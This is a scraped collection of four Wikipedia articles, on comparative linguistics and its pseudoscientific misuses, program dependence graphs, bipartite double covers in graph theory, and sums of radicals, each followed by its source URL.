The fundamental technique of comparative linguistics is to comparephonologicalsystems,morphologicalsystems,syntaxand the lexicon of two or more languages using techniques such as thecomparative method. In principle, every difference between two related languages should be explicable to a high degree of plausibility; systematic changes, for example in phonological or morphological systems are expected to be highly regular (consistent). In practice, the comparison may be more restricted, e.g. just to the lexicon. In some methods it may be possible to reconstruct an earlierproto-language. Although the proto-languages reconstructed by the comparative method are hypothetical, a reconstruction may have predictive power. The most notable example of this isFerdinand de Saussure's proposal that theIndo-Europeanconsonantsystem containedlaryngeals, a type of consonant attested in no Indo-European language known at the time. The hypothesis was vindicated with the discovery ofHittite, which proved to have exactly the consonants Saussure had hypothesized in the environments he had predicted.
Where languages are derived from a very distant ancestor, and are thus more distantly related, the comparative method becomes less practicable.[1]In particular, attempting to relate two reconstructed proto-languages by the comparative method has not generally produced results that have met with wide acceptance.[citation needed]The method has also not been very good at unambiguously identifying sub-families; thus, different scholars[who?]have produced conflicting results, for example in Indo-European.[citation needed]A number of methods based on statistical analysis of vocabulary have been developed to try and overcome this limitation, such aslexicostatisticsandmass comparison. The former uses lexicalcognateslike the comparative method, while the latter uses onlylexical similarity. The theoretical basis of such methods is that vocabulary items can be matched without a detailed language reconstruction and that comparing enough vocabulary items will negate individual inaccuracies; thus, they can be used to determine relatedness but not to determine the proto-language.
The earliest method of this type was the comparative method, which was developed over many years, culminating in the nineteenth century. This uses a long word list and detailed study. However, it has been criticized for example as subjective, informal, and lacking testability.[2]The comparative method uses information from two or more languages and allows reconstruction of the ancestral language. The method ofinternal reconstructionuses only a single language, with comparison of word variants, to perform the same function. Internal reconstruction is more resistant to interference but usually has a limited available base of utilizable words and is able to reconstruct only certain changes (those that have left traces as morphophonological variations).
In the twentieth century an alternative method,lexicostatistics, was developed, which is mainly associated withMorris Swadeshbut is based on earlier work. This uses a short word list of basic vocabulary in the various languages for comparisons. Swadesh used 100 (earlier 200) items that are assumed to be cognate (on the basis of phonetic similarity) in the languages being compared, though other lists have also been used. Distance measures are derived by examination of language pairs but such methods reduce the information. An outgrowth of lexicostatistics isglottochronology, initially developed in the 1950s, which proposed a mathematical formula for establishing the date when two languages separated, based on percentage of a core vocabulary of culturally independent words. In its simplest form a constant rate of change is assumed, though later versions allow variance but still fail to achieve reliability. Glottochronology has met with mounting scepticism, and is seldom applied today. Dating estimates can now be generated by computerised methods that have fewer restrictions, calculating rates from the data. However, no mathematical means of producing proto-language split-times on the basis of lexical retention has been proven reliable.
Another controversial method, developed byJoseph Greenberg, ismass comparison.[3]The method, which disavows any ability to date developments, aims simply to show which languages are more and less close to each other. Greenberg suggested that the method is useful for preliminary grouping of languages known to be related as a first step toward more in-depth comparative analysis.[4]However, since mass comparison eschews the establishment of regular changes, it is flatly rejected by the majority of historical linguists.[5]
Recently, computerised statistical hypothesis testing methods have been developed which are related to both thecomparative methodandlexicostatistics. Character based methods are similar to the former and distanced based methods are similar to the latter (seeQuantitative comparative linguistics). The characters used can be morphological or grammatical as well as lexical.[6]Since the mid-1990s these more sophisticated tree- and network-basedphylogeneticmethods have been used to investigate the relationships between languages and to determine approximate dates for proto-languages. These are considered by many to show promise but are not wholly accepted by traditionalists.[7]However, they are not intended to replace older methods but to supplement them.[8]Such statistical methods cannot be used to derive the features of a proto-language, apart from the fact of the existence of shared items of the compared vocabulary. These approaches have been challenged for their methodological problems, since without a reconstruction or at least a detailed list of phonological correspondences there can be no demonstration that two words in different languages are cognate.[citation needed]
There are other branches of linguistics that involve comparing languages, which are not, however, part ofcomparative linguistics:
Comparative linguistics includes the study of the historical relationships of languages using the comparative method to search for regular (i.e., recurring) correspondences between the languages' phonology, grammar, and core vocabulary, and through hypothesis testing, which involves examining specific patterns of similarity and difference across languages; some persons with little or no specialization in the field sometimes attempt to establish historical associations between languages by noting similarities between them, in a way that is consideredpseudoscientificby specialists (e.g. spurious comparisons betweenAncient Egyptianand languages likeWolof, as proposed byDiopin the 1960s[9]).
The most common method applied in pseudoscientific language comparisons is to search two or more languages for words that seem similar in their sound and meaning. While similarities of this kind often seem convincing to laypersons, linguistic scientists consider this kind of comparison to be unreliable for two primary reasons. First, the method applied is not well-defined: the criterion of similarity is subjective and thus not subject toverification or falsification, which is contrary to the principles of the scientific method. Second, the large size of all languages' vocabulary and a relatively limited inventory of articulated sounds used by most languages makes it easy to find coincidentally similar words between languages.[citation needed][10]
There are sometimes political or religious reasons for associating languages in ways that some linguists would dispute. For example, it has been suggested that theTuranianorUral–Altaic languagegroup, which relatesSamiand other languages to theMongolian language, was used to justifyracismtowards the Sami in particular.[11]There are also strong, albeitarealnotgenetic, similarities between theUralicandAltaiclanguages which provided an innocent basis for this theory. In 1930sTurkey, some promoted theSun Language Theory, one that showed thatTurkic languageswere close to the original language. Some believers inAbrahamic religionstry to derive their native languages fromClassical Hebrew, asHerbert W. Armstrong, a proponent ofBritish Israelism, who said that the wordBritishcomes from Hebrewbritmeaning 'covenant' andishmeaning 'man', supposedly proving that the British people are the 'covenant people' of God. AndLithuanian-AmericanarchaeologistMarija Gimbutasargued during the mid-1900s that Basque is clearly related to the extinctPictishand Etruscan languages, in attempt to show that Basque was a remnant of an "Old European culture".[12]In theDissertatio de origine gentium Americanarum(1625), the Dutch lawyerHugo Grotius"proves" that the American Indians (Mohawks) speak a language (lingua Maquaasiorum) derived from Scandinavian languages (Grotius was on Sweden's payroll), supporting Swedish colonial pretensions in America.
The Dutch doctorJohannes Goropius Becanus, in hisOrigines Antverpiana(1580) admitsQuis est enim qui non amet patrium sermonem("Who does not love his fathers' language?"), whilst asserting that Hebrew is derived from Dutch. The FrenchmanÉloi Johanneauclaimed in 1818 (Mélanges d'origines étymologiques et de questions grammaticales) that the Celtic language is the oldest, and the mother of all others.
In 1759,Joseph de Guignestheorized (Mémoire dans lequel on prouve que les Chinois sont une colonie égyptienne) that the Chinese and Egyptians were related, the former being a colony of the latter. In 1885,Edward Tregear(The Aryan Maori) compared the Maori and "Aryan" languages.Jean Prat[fr], in his 1941Les langues nitales, claimed that the Bantu languages of Africa are descended from Latin, coining the French linguistic termnitalein doing so. Just as Egyptian is related to Brabantic, followingBecanusin hisHieroglyphica, still using comparative methods.
The first practitioners of comparative linguistics were not universally acclaimed: upon reading Becanus' book,Scaligerwrote, "never did I read greater nonsense", andLeibnizcoined the termgoropism(fromGoropius) to designate a far-sought, ridiculous etymology.
There have also been assertions that humans are descended from non-primate animals, with the use of the voice being the primary basis for comparison.Jean-Pierre Brisset(in La Grande Nouvelle, around 1900) believed and claimed that humans evolved from frogs through linguistic connections, arguing that the croaking of frogs resembles spoken French. He suggested that the French word logement, meaning 'dwelling,' originated from the word l'eau, which means 'water.'[13]
|
https://en.wikipedia.org/wiki/Comparative_linguistics
|
AProgram Dependence Graph(PDG) is adirected graphof a program'scontrolanddata dependencies. Nodes represent program statements and edges represent dependencies between these statements.
PDGs are used in optimization, debugging, and understanding program behavior. One example of this is their utilization by compilers duringdependence analysis, enabling theoptimizing compilerto make transformations to allow forparallelism.[1][2]
Thiscomputer sciencearticle is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Program_dependence_graph
|
Ingraph theory, thebipartite double coverof anundirected graphGis abipartite,covering graphofG, with twice as manyverticesasG. It can be constructed as thetensor product of graphs,G×K2. It is also called theKronecker double cover,canonical double coveror simply thebipartite doubleofG.
It should not be confused with acycle double coverof a graph, a family of cycles that includes each edge twice.
The bipartite double cover ofGhas two verticesuiandwifor each vertexviofG. Two verticesuiandwjare connected by an edge in the double cover if and only ifviandvjare connected by an edge inG. For instance, below is an illustration of a bipartite double cover of a non-bipartite graphG. In the illustration, each vertex in the tensor product is shown using a color from the first term of the product (G) and a shape from the second term of the product (K2); therefore, the verticesuiin the double cover are shown as circles while the verticeswiare shown as squares.
The bipartite double cover may also be constructed using adjacency matrices (as described below) or as the derived graph of avoltage graphin which each edge ofGis labeled by the nonzero element of the two-elementgroup.
The bipartite double cover of thePetersen graphis theDesargues graph:K2×G(5,2) =G(10,3).
The bipartite double cover of acomplete graphKnis acrown graph(acomplete bipartite graphKn,nminus aperfect matching). In particular, the bipartite double cover of the graph of atetrahedron,K4, is the graph of acube.
The bipartite double cover of an odd-lengthcycle graphis a cycle of twice the length, while the bipartite double of any bipartite graph (such as an even length cycle, shown in the following example) is formed by two disjoint copies of the original graph.
If an undirected graphGhas a matrixAas itsadjacency matrix, then the adjacency matrix of the double cover ofGis
and thebiadjacency matrixof the double cover ofGis justAitself. That is, the conversion from a graph to its double cover can be performed simply by reinterpretingAas a biadjacency matrix instead of as an adjacency matrix. More generally, the reinterpretation the adjacency matrices ofdirected graphsas biadjacency matrices provides acombinatorial equivalencebetween directed graphs and balanced bipartite graphs.[1]
The bipartite double cover of any graphGis abipartite graph; both parts of the bipartite graph have one vertex for each vertex ofG. A bipartite double cover isconnectedif and only ifGis connected and non-bipartite.[2]
The bipartite double cover is a special case of adouble cover(a 2-foldcovering graph). A double cover in graph theory can be viewed as a special case of atopological double cover.
IfGis a non-bipartitesymmetric graph, the double cover ofGis also a symmetric graph; several knowncubicsymmetric graphs may be obtained in this way. For instance, the double cover ofK4is the graph of a cube; the double cover of the Petersen graph is the Desargues graph; and the double cover of the graph of thedodecahedronis a 40-vertex symmetric cubic graph.[3]
It is possible for two different graphs to haveisomorphicbipartite double covers. For instance, the Desargues graph is not only the bipartite double cover of the Petersen graph, but is also the bipartite double cover of a different graph that is not isomorphic to the Petersen graph.[4]Not every bipartite graph is a bipartite double cover of another graph; for a bipartite graphGto be the bipartite cover of another graph, it is necessary and sufficient that theautomorphismsofGinclude aninvolutionthat maps each vertex to a distinct and non-adjacent vertex.[4]For instance, the graph with two vertices and one edge is bipartite but is not a bipartite double cover, because it has no non-adjacent pairs of vertices to be mapped to each other by such an involution; on the other hand, the graph of the cube is a bipartite double cover, and has an involution that maps each vertex to the diametrally opposite vertex. An alternative characterization of the bipartite graphs that may be formed by the bipartite double cover construction was obtained bySampathkumar (1975).
In aconnected graphthat is not bipartite, only one double cover is bipartite, but when the graph is bipartite or disconnected there may be more than one. For this reason,Tomaž Pisanskihas argued that the name "bipartite double cover" should be deprecated in favor of the "canonical double cover" or "Kronecker cover", names which are unambiguous.[5]
In general, a graph may have multiple double covers that are different from the bipartite double cover.[6]
In the following figure, the graphCis a double cover of the graphH:
However,Cis not thebipartite double coverofHor any other graph; it is not a bipartite graph.
If we replace one triangle by a square inHthe resulting graph has four distinct double
covers. Two of them are bipartite but only one of them is the Kronecker cover.
As another example, the graph of theicosahedronis a double cover of the complete graphK6; to obtain a covering map from the icosahedron toK6, map each pair of opposite vertices of the icosahedron to a single vertex ofK6. However, the icosahedron is not bipartite, so it is not the bipartite double cover ofK6. Instead, it can be obtained as theorientable double coverof anembeddingofK6on theprojective plane.
The double covers of a graph correspond to the different ways tosign the edgesof the graph.
|
https://en.wikipedia.org/wiki/Bipartite_double_cover
|
In mathematics, asum of radicalsis defined as a finitelinear combinationofnth roots:
wheren,ri{\displaystyle n,r_{i}}arenatural numbersandki,xi{\displaystyle k_{i},x_{i}}arereal numbers.
A particular special case arising incomputational complexity theoryis thesquare-root sum problem, asking whether it is possible to determine the sign of a sum ofsquare roots, with integer coefficients, inpolynomial time. This is of importance for many problems incomputational geometry, since the computation of theEuclidean distancebetween two points in the general case involves the computation of asquare root, and therefore theperimeterof apolygonor the length of a polygonal chain takes the form of a sum of radicals.[1]
In 1991, Blömer proposed a polynomial timeMonte Carlo algorithmfor determining whether a sum of radicals is zero, or more generally whether it represents a rational number.[2]Blömer's result applies more generally than the square-root sum problem, to sums of radicals that are not necessarily square roots. However, his algorithm does not solve the problem, because it does not determine the sign of a non-zero sum of radicals.[2]
|
https://en.wikipedia.org/wiki/Sum_of_radicals
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.